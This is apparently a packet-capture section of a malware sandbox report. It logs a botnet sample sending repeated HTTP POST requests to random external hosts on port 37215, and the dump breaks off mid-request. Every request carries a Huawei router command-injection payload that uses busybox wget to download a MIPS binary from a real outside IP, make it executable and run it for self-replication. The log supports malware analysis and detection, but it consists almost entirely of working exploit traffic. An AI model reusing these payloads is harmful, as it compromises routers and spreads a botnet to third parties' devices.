                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  235192.168.2.1340980157.240.173.11337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667915106 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  236192.168.2.1341942208.222.36.16137215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667927027 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  237192.168.2.134317241.131.198.17437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667958975 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  238192.168.2.1360316197.183.43.16537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.667985916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  239192.168.2.1350828157.141.2.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668040991 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  240192.168.2.1339962157.13.244.21837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668061972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  241192.168.2.1345824197.225.13.18837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668061972 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  242192.168.2.1334796157.98.156.19437215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668087959 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  243192.168.2.135891041.11.131.7537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668112040 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  244192.168.2.135272241.174.24.5037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:11.668139935 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 